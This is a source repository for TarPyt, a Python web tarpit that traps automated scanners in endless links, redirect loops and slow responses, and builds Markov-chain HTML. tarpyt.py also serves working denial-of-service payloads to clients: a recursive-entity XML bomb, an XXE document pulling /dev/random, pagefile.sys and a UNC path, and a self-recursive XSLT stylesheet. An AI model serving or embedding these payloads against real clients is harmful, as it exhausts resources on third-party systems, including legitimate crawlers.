├── .gitignore
├── README.md
├── genmarkov.py
├── tarpyt-fcgi.py
├── tarpyt-wsgiref.py
├── tarpyt.cfg
├── tarpyt.py
└── www
    └── robots.txt

/.gitignore:
--------------------------------------------------------------------------------
*.pyc
*.mkv
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
TarPyt
======
TarPyt is a Python Web tarpit, inspired by a description of a PHP
equivalent called [Labyrinth](https://code.google.com/p/weblabyrinth/).
It's an automated scanner's worst nightmare: a maze of twisty URIs, all alike.

Running TarPyt
--------------

TarPyt can be run on its own or as a
[WSGI](http://wsgi.readthedocs.org/en/latest/index.html) app. In its current
(testing) state, running under a separate web server as a WSGI app has not
been tested, but should work just fine. To run standalone, just run the
bundled wsgiref launcher:

    python tarpyt-wsgiref.py -f tarpyt.cfg
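To mount TarPyt under an external WSGI server instead, the server only needs
the `application` attribute of a `Tarpyt` instance. A minimal sketch, assuming
[gunicorn](http://gunicorn.org/) (untested; the wrapper module name `wsgi.py`
is illustrative):

    # wsgi.py -- hypothetical wrapper module for an external WSGI server
    from tarpyt import Tarpyt

    # Tarpyt.application is a standard WSGI callable
    application = Tarpyt('tarpyt.cfg').application

and then, for example:

    gunicorn wsgi:application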
Generating Markov chains
------------------------

The included `genmarkov.py` can be used to generate and
[pickle](http://docs.python.org/library/pickle.html) a simple Markov chain for
building HTML-like content. I've had decent luck pointing it at the
[Alexa](http://www.alexa.com/topsites) top 20 web sites, downloaded with
`wget`. Currently, TarPyt only uses these chains to generate URLs, but full
pages will be coming soon. (An end-to-end example appears at the end of this
README.)

Features
--------
A random list of features, to be better organized later:

* WSGI-compatible interface
* "Random" different responses (HTTP redirects, link pages, etc.)
* Base response on a hash of the request, so it's consistent
* Generate Markov chains of HTML and URI paths for realistic responses
* Infinite redirect loops
* Artificially slow responses (1 byte per second)
* Artificially large (4 GB) Content-Length headers for agents that
  pre-allocate storage

Todo
----
* Shell script to get top 100 Alexa sites and build Markov chains
* Use Markov chains to build HTML in responses
* False positives for scanners: SQLi (database errors), etc.
* Alerting, stats?

Attacks
-------
Possible ideas for cruelty to scanners/spiders:

* Pathological-case compression (high resource use for recipient)
* Broken markup: research edge cases for XML parsers
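As promised above, an end-to-end example (the file names and seed site are
illustrative): fetch some seed pages with `wget`, build and pickle a chain,
point the `markov_file` setting in `tarpyt.cfg` at the result, and serve:

    wget -r -l 1 -nd -A html http://example.com/
    python genmarkov.py -p html.mkv *.html
    python tarpyt-wsgiref.py -f tarpyt.cfg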
--------------------------------------------------------------------------------
/genmarkov.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# Python 2

from HTMLParser import HTMLParser, HTMLParseError
from optparse import OptionParser
import pickle
import random
# codecs.open intentionally shadows the builtin open, giving decoded file objects
from codecs import open

class MarkovChain(object):
    """A first-order Markov chain over words, weighted by observed frequency."""
    def __init__(self):
        self.words = {}
        self.maxcount = 0

    def add(self, prev_word, next_word):
        if prev_word not in self.words:
            self.words[prev_word] = {}
        if next_word not in self.words[prev_word]:
            self.words[prev_word][next_word] = 0
        self.words[prev_word][next_word] += 1
        self.maxcount = max(self.maxcount, self.words[prev_word][next_word])

    def get(self, prev_word):
        """Return a follower of prev_word, chosen proportionally to its count."""
        if prev_word not in self.words:
            return random.choice(self.words.keys())
        followers = self.words[prev_word]
        allcounts = sum(followers.itervalues())
        randval = random.randint(1, allcounts)
        partial_sum = 0
        for word, count in followers.iteritems():
            partial_sum += count
            if partial_sum >= randval:
                return word

class TagState(object):
    """Tracks, for one open tag, the most recent child seen ('^' = none yet)."""
    def __init__(self, tag='^', prev='^'):
        self.prev_child = prev
        self.tag = tag

class MarkovBuilder(HTMLParser, object):
    """Builds Markov chains of tag siblings, children, attributes, text data,
    and href URI paths from parsed HTML, and can generate similar HTML."""

    def setup_chain(self):
        self.siblings = MarkovChain()
        self.children = MarkovChain()
        self.attrs = MarkovChain()
        self.data = MarkovChain()
        self.uripaths = MarkovChain()
        self.tagstack = [TagState()]
        self.maxsibs = 0
        self.maxdepth = 0
        self.gendepth = 0
        self.popped = True

    def handle_starttag(self, tag, attrs):
        self.popped = False
        state = self.tagstack[-1]
        # These tags are typically left unclosed; close them implicitly.
        if state.tag in ('meta', 'input', 'img', 'br', 'script', 'style', 'link'):
            self.handle_endtag(state.tag)
            state = self.tagstack[-1]
        if state.prev_child == '^':
            self.children.add(state.tag, tag)
        else:
            self.siblings.add(state.prev_child, tag)
        state.prev_child = tag
        prev_attr = tag
        for attr in attrs:
            if attr[0] == 'href':
                # Record the link's path elements ('^' start marker, '$' end marker)
                prev_path = '^'
                elems = attr[1].split('/')
                if len(elems) > 1 and elems[1] == '':
                    # Absolute URL: drop the scheme and host parts
                    elems = elems[3:]
                for elem in elems:
                    self.uripaths.add(prev_path, elem)
                    prev_path = elem
                self.uripaths.add(prev_path, '$')
            str_attr = u'{0}="{1}"'.format(*attr)
            self.attrs.add(prev_attr, str_attr)
            prev_attr = str_attr
        self.attrs.add(prev_attr, '$')
        newstate = TagState(tag=tag)
        self.tagstack.append(newstate)
        self.maxdepth = max(self.maxdepth, len(self.tagstack))

    def handle_endtag(self, tag):
        state = self.tagstack.pop()
        if len(self.tagstack) == 0:
            self.tagstack = [TagState()]
        if state.prev_child == '^':
            self.children.add(state.tag, '$')
        if self.popped:
            self.siblings.add(state.tag, '$')
        self.popped = True

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
        self.handle_endtag(tag)

    def handle_data(self, data):
        self.data.add(self.tagstack[-1].tag, data)

    def unknown_decl(self, data):
        # Ignore unrecognized declarations instead of raising an error
        pass

    def save(self, filename='html.mkv'):
        out = open(filename, mode='wb')
        pickle.dump(self, out, protocol=2)
        out.close()

    def generate(self, tag='html', generate_links=False, depth=0):
        out = []
        count = 0
        while tag != '$' and count <= self.siblings.maxcount:
            count += 1
            contents = []
            if generate_links and tag == 'a':
                # Build an href from the URI-path chain instead of raw attributes
                path = ['^']
                while path[-1] != '$':
                    path.append(self.uripaths.get(path[-1]))
                contents = [tag] + [u'href="/{0}"'.format('/'.join(path[1:-1]))]
            else:
                attr = tag
                while attr != '$':
                    contents.append(attr)
                    attr = self.attrs.get(attr)
            out.append(u'<{0}>\n'.format(' '.join(contents)))
            data = self.data.get(tag)
            if data and data != '$':
                out.append(data)
            first_child = self.children.get(tag)
            if first_child and first_child != '$':
                depth += 1
                if depth <= self.maxdepth:
                    out.append(self.generate(
                        first_child,
                        generate_links=generate_links,
                        depth=depth))
            out.append(u'</{0}>\n'.format(tag))
            tag = self.siblings.get(tag)
        return ''.join(out)

    def reset(self):
        super(MarkovBuilder, self).reset()
        self.tagstack = [TagState()]

class GotCharset(Exception):
    """Raised by EncodingDetector to abort parsing once a charset is found."""
    def __init__(self, charset):
        assert charset
        self.charset = charset

class EncodingDetector(HTMLParser):
    def handle_starttag(self, tag, attrs):
        if tag == 'meta':
            attrhash = dict(attrs)
            if 'charset' in attrhash:
                raise GotCharset(attrhash['charset'])
            elif 'http-equiv' in attrhash:
                if attrhash['http-equiv'].lower() == 'content-type':
                    for chunk in attrhash['content'].split(';'):
                        if 'charset' in chunk:
                            raise GotCharset(chunk.split('=')[-1])

def parse(filenames):
    builder = MarkovBuilder()
    builder.setup_chain()
    for fname in filenames:
        # First pass: assume UTF-8, but watch for a declared charset
        filein = open(fname, mode='rb', encoding='utf-8', errors='replace')
        try:
            try:
                getcharset = EncodingDetector()
                for line in filein:
                    getcharset.feed(line)
            except GotCharset as e:
                # Reopen with the declared encoding
                filein.close()
                filein = open(fname, mode='rb', encoding=e.charset, errors='replace')
            filein.seek(0)
            builder.feed(filein.read())
            builder.close()
        except HTMLParseError:
            pass
        builder.reset()
        filein.close()
    return builder


if __name__ == '__main__':
    parser = OptionParser()
    parser.add_option('-p', '--pickle',
        help='Pickle the MarkovBuilder into FILE', metavar='FILE')
    (options, args) = parser.parse_args()
    builder = parse(args)
    if options.pickle:
        builder.save(options.pickle)
    print builder.generate().encode('utf-8')
--------------------------------------------------------------------------------
/tarpyt-fcgi.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

from flup.server.fcgi import WSGIServer
from optparse import OptionParser
from tarpyt import Tarpyt

if __name__ == '__main__':
    parser = OptionParser()
    parser.add_option('-f', '--config',
        help='Tarpyt config file', metavar='FILE')
    (options, args) = parser.parse_args()
    tarpyt = Tarpyt(options.config)
    WSGIServer(tarpyt.application).run()
--------------------------------------------------------------------------------
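A note on the FastCGI launcher above: invoked as written, flup expects to
inherit its FastCGI socket from the web server that spawned it. To listen on a
TCP socket instead, flup's `bindAddress` argument can be passed through (a
sketch; the address and port are illustrative, and the front-end web server
must be configured to connect to them):

    WSGIServer(tarpyt.application, bindAddress=('127.0.0.1', 9000)).run()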
/tarpyt-wsgiref.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python

from wsgiref.simple_server import make_server
from optparse import OptionParser
from tarpyt import Tarpyt

if __name__ == '__main__':
    parser = OptionParser()
    parser.add_option('-f', '--config',
        help='Tarpyt config file', metavar='FILE')
    (options, args) = parser.parse_args()
    tarpyt = Tarpyt(options.config)
    httpd = make_server('', 8080, tarpyt.application)
    httpd.serve_forever()
--------------------------------------------------------------------------------
/tarpyt.cfg:
--------------------------------------------------------------------------------
# Config file for TarPyt
[tarpyt]
# A pickled instance of a genmarkov.MarkovBuilder object
#markov_file= html.mkv
# A directory out of which to serve files; existing files take
# precedence over the [responses] below
www_dir= ./www

# Responses to use, chosen proportionally to their weight
[responses]
# A page full of links
linkpage= 7
# A redirect to some other page
redirect= 1
# A chain of redirects that loops back on itself
inf_redirect= 1
# An empty response with an oversize Content-Length header
oversize= 1
# A response returned one byte per second
slow= 1
# XSL template recursion
xslt_recurse= 1
# External entity references to large/infinite local system files
xxe_dos= 1
# Memory exhaustion through recursive entity definitions
entity_dos= 1
--------------------------------------------------------------------------------
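The [responses] weights above are consumed by tarpyt.py (next file) roughly as
sketched below: the sorted weights become cumulative boundaries, and an
adler32 hash of the request selects a slot, so a given request always maps to
the same response. The hard-coded weights here are just an illustration:

    from bisect import bisect_right
    from zlib import adler32

    weights = {'linkpage': 7, 'redirect': 1, 'slow': 1}
    names, bounds, total = [], [], 0
    for name, weight in sorted(weights.items(), key=lambda kv: kv[1]):
        total += weight
        names.append(name)
        bounds.append(total)  # cumulative upper boundary for this response

    def pick(request_key):
        # Same key -> same slot -> same response on every request
        return names[bisect_right(bounds, adler32(request_key) % total)]

    print pick('GET/some/path')  # deterministic for a given key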
/tarpyt.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# Python 2

import random
from zlib import adler32
from ConfigParser import SafeConfigParser, NoOptionError
from bisect import bisect_right
import pickle
import time
import urllib
import os

# Imported so pickle can resolve these classes when loading a markov_file
from genmarkov import MarkovBuilder, TagState, MarkovChain

class Tarpyt(object):
    def __init__(self, config=None):
        self.builder = None
        self.www_dir = None
        conf = SafeConfigParser()
        if config:
            if hasattr(config, 'readline'):
                conf.readfp(config)
            else:
                conf.read(config)
        if conf.has_section('tarpyt'):
            try:
                mkvfile = conf.get('tarpyt', 'markov_file')
                mfile = open(mkvfile, 'rb')
                self.set_builder(pickle.load(mfile))
                mfile.close()
            except NoOptionError:
                self.builder = None
            try:
                www = conf.get('tarpyt', 'www_dir')
                self.www_dir = os.path.abspath(www) if os.path.isdir(www) else None
            except NoOptionError:
                self.www_dir = None
        self.weight_total = 0
        self.responses = []
        if conf.has_section('responses'):
            # Build a cumulative weight list alongside the response methods
            def update(response):
                self.responses.append(
                    getattr(self, 'response_' + response[0]))
                self.weight_total += int(response[1])
                return self.weight_total
            self.weights = map(update,
                sorted(conf.items('responses'), key=lambda x: int(x[1])))
        else:
            self.responses.append(self.response_linkpage)
            self.weights = [1]
            self.weight_total = 1

    def getresponse(self, key):
        """Deterministically map a request key to a weighted response."""
        index = adler32(key) % self.weight_total
        return self.responses[bisect_right(self.weights, index)]

    def getlink(self, path='/'):
        # Default link generator: append one random lowercase letter (a-z)
        next_path = path.rstrip('/') + '/{0}'
        return next_path.format(chr(random.randint(0x61, 0x7A)))

    def set_builder(self, builder):
        self.builder = builder
        def getlink(path='/'):
            # Markov-based link generator: extend the path with a likely element
            pathlist = ['^']
            pathlist.extend(filter(lambda x: x, path.split('/')))
            elem = self.builder.uripaths.get(pathlist[-1])
            if elem == '$':
                elem = self.builder.uripaths.get(None)
            return '/' + '/'.join(pathlist[1:] + [elem])
        self.getlink = getlink

    def response_slow(self, environ, start_response):
        """ Category: tarpit
        Returns an html page, but very slowly
        """
        if self.builder:
            content = self.builder.generate(generate_links=True)
        else:
            content = u"A" * 4096
        body = content.encode('utf-8')
        status = '200 OK'
        # Content-Length must count encoded bytes, not unicode characters
        headers = [('Content-Length', str(len(body)))]
        start_response(status, headers)
        for char in body:
            yield char
            time.sleep(1)

    def response_linkpage(self, environ, start_response):
        """ Category: tarpit
        Returns an html page full of links
        """
        if self.builder:
            response_body = self.builder.generate(generate_links=True)
        else:
            page_string = u'<html><head><title>Welcome to the Labyrinth' \
                u'</title></head><body><ul>{0}</ul></body></html>'
            link_string = u'<li><a href="{0}">{0}</a></li>'
            links = []
            for n in range(0, 5):
                href = self.getlink(os.path.normpath(
                    environ['SCRIPT_NAME'] + '/' + environ['PATH_INFO']))
                links.append(link_string.format(href))
            response_body = page_string.format(''.join(links))
        status = '200 OK'
        start_response(status, [])
        if isinstance(response_body, unicode):
            response_body = response_body.encode('utf-8')
        return [response_body]

    def response_redirect(self, environ, start_response):
        """ Category: realism
        Redirects to a random page
        """
        status = '302 Found'
        location = self.getlink(environ['SCRIPT_NAME'])
        if isinstance(location, unicode):
            location = urllib.quote(location.encode('utf-8'))
        headers = [('Location', location)]
        start_response(status, headers)
        return ""

    def response_inf_redirect(self, environ, start_response):
        """ Category: tarpit
        Returns a 302 redirect to a page whose hash has the same modulus as
        the one requested, so this handler is chosen again and the client
        loops forever. If a suitable redirect cannot be made, falls back to
        appending a random path element to the requested path.
        """
        newpath = environ['PATH_INFO']
        modulus = self.weight_total
        tmp = 0
        chord = 0
        pos = len(newpath) - 1
        # Walk backwards looking for a character that can be replaced by a
        # different alphanumeric congruent to it modulo the weight total.
        while pos > 0:
            chord = ord(newpath[pos])
            tmp = chord + modulus
            while tmp != chord:
                if tmp > ord('z'):
                    tmp %= modulus
                if (tmp >= 0x30 and tmp <= 0x39) \
                        or (tmp >= 0x41 and tmp <= 0x5A) \
                        or (tmp >= 0x61 and tmp <= 0x7A):
                    break
                tmp += modulus
            if tmp == chord:
                pos -= 1
            else:
                break
        if pos != 0:
            newpath = newpath[:pos] + chr(tmp) + newpath[pos+1:]
        else:
            newpath = self.getlink(newpath)
        status = '302 Found'
        if isinstance(newpath, unicode):
            newpath = urllib.quote(newpath.encode('utf-8'))
        headers = [('Location', os.path.normpath(
            environ['SCRIPT_NAME'] + '/' + newpath))]
        start_response(status, headers)
        return ""

    def response_oversize(self, environ, start_response):
        """ Category: attack
        Sends an oversized Content-Length header. Some web servers have had
        Denial of Service vulnerabilities due to preallocating memory or disk
        (e.g. https://secunia.com/advisories/35645). Some spiders may have
        similar vulns (see, e.g., this feature request for wget:
        https://lists.gnu.org/archive/html/bug-wget/2012-01/msg00054.html)
        """
        status = '200 OK'
        headers = [('Content-Length', str(4 * 2**30))]
        start_response(status, headers)
        return ["", ""]  # Prevent the WSGI server from calculating Content-Length

    def response_entity_dos(self, environ, start_response):
        """ Category: attack
        Sends a malicious XML document that triggers a denial of service
        through recursive entity expansion ("billion laughs").

        Reference: CWE-776 (http://cwe.mitre.org/data/definitions/776.html)
        """
        status = '200 OK'
        headers = [('Content-type', 'application/xml')]
        start_response(status, headers)
        return ["""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE spam [
<!ENTITY a "spam">
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
<!ENTITY e "&d;&d;&d;&d;&d;&d;&d;&d;&d;&d;">
<!ENTITY f "&e;&e;&e;&e;&e;&e;&e;&e;&e;&e;">
<!ENTITY g "&f;&f;&f;&f;&f;&f;&f;&f;&f;&f;">
<!ENTITY h "&g;&g;&g;&g;&g;&g;&g;&g;&g;&g;">
<!ENTITY spam "&h;&h;&h;&h;&h;&h;&h;&h;&h;&h;">
]>
<spam>&spam;</spam>
"""]
    def response_xxe_dos(self, environ, start_response):
        """ Category: attack
        Sends a malicious XML document that triggers a denial of service
        through XML eXternal Entity (XXE) references. Works best against *nix
        by reading from devices that never close. On Windows, currently tries
        to read pagefile.sys and access a probably-nonexistent server via UNC
        path. See
        http://archive.cert.uni-stuttgart.de/bugtraq/2002/10/msg00421.html
        """
        status = '200 OK'
        headers = [('Content-type', 'application/xml')]
        start_response(status, headers)
        return ["""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE spam [
<!ENTITY r SYSTEM "file:///dev/random">
<!ENTITY p SYSTEM "file:///c:/pagefile.sys">
<!ENTITY u SYSTEM "file://nonexistent-server/share/file">
]>
<spam>&r;&p;&u;</spam>
"""]

    def response_xslt_recurse(self, environ, start_response):
        """ Category: attack
        Sends an XSL stylesheet containing an infinite recursion. The
        stylesheet, itself XML, references itself as its own stylesheet to
        begin the transform process, and the root template calls itself.
        """
        status = '200 OK'
        headers = [('Content-type', 'application/xml')]
        start_response(status, headers)
        return ["""<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="{0}"?>
<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    SPAM
    <xsl:apply-templates select="/"/>
  </xsl:template>
</xsl:stylesheet>
""".format(os.path.normpath(environ['SCRIPT_NAME'] + '/' + environ['PATH_INFO']))]

    def application(self, environ, start_response):
        verb = environ['REQUEST_METHOD']
        path = os.path.normpath('/' + environ['PATH_INFO'])
        if self.www_dir:
            # Serve real files (e.g. robots.txt) from www_dir if present;
            # normpath plus the prefix check blocks directory traversal.
            filepath = os.path.normpath(os.path.sep.join((self.www_dir, path)))
            if filepath.startswith(self.www_dir):
                try:
                    serve = open(filepath, 'rb')
                    body = [serve.read()]
                    start_response('200 OK', [])
                    return body
                except Exception:
                    pass
        return self.getresponse(verb + path)(environ, start_response)
--------------------------------------------------------------------------------
/www/robots.txt:
--------------------------------------------------------------------------------
User-Agent: *
Disallow: /
--------------------------------------------------------------------------------